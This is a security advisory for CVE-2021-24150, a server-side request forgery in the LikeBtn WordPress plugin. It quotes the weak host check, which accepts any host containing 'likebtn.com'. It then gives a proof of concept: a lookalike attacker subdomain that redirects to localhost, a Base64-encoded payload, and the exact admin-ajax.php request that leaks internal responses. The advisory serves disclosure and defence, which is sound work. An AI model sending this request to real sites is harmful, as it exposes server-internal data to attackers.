Like Button Rating < 2.6.32 – Unauthenticated Full-Read SSRF | CVE 2021-24150

Description

The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF).

On line 7493 in likebtn_like_button.php a hook is set to allow unauthenticated ajax calls which will call the function likebtn_prx(). As the name suggests, this function works as a proxy and can be used to make the server issue a request to a user-specified URL as long as the host is likebtn.com. The URL to request must be specified in the GET parameter likebtn_q as a Base64 encoded value. To ensure that the host is likebtn.com the following host-check is performed:

if (!strstr(parse_url($url, PHP_URL_HOST), 'likebtn.com')) {
$response['err'] = 'Wrong prx address';
} else {
...
}

As you might notice, this host-check fails rather miserably. As long as the string "likebtn.com" appears somewhere in the host, the URL is accepted. This means that eg. the following would be accepted:

likebtn.com.attackerwebsite.bla

A GET request is then sent to the specified URL by using WP_Http::request. Since redirects are followed, an attacker can easily make the server request whatever they want. Finally, the response is dumped using echo as seen on lines 7400-7409.

Proof of Concept

Let's say that an attacker owns the website attackerwebsite.bla and wants to attack targetwebsite.bla which uses the LikeBtn WP plugin. The attacker would then do the following:

1. Create the subdomain likebtn.com.attackerwebsite.bla
2. Make the subdomain redirect to localhost
3. Base64 encode the URL to the new subdomain (http://likebtn.com.attackerwebsite.bla -> aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=)
4. Make a request to https://targetwebsite.bla/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q= aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=
5. The attacker then receives all the juicy secret info stored on localhost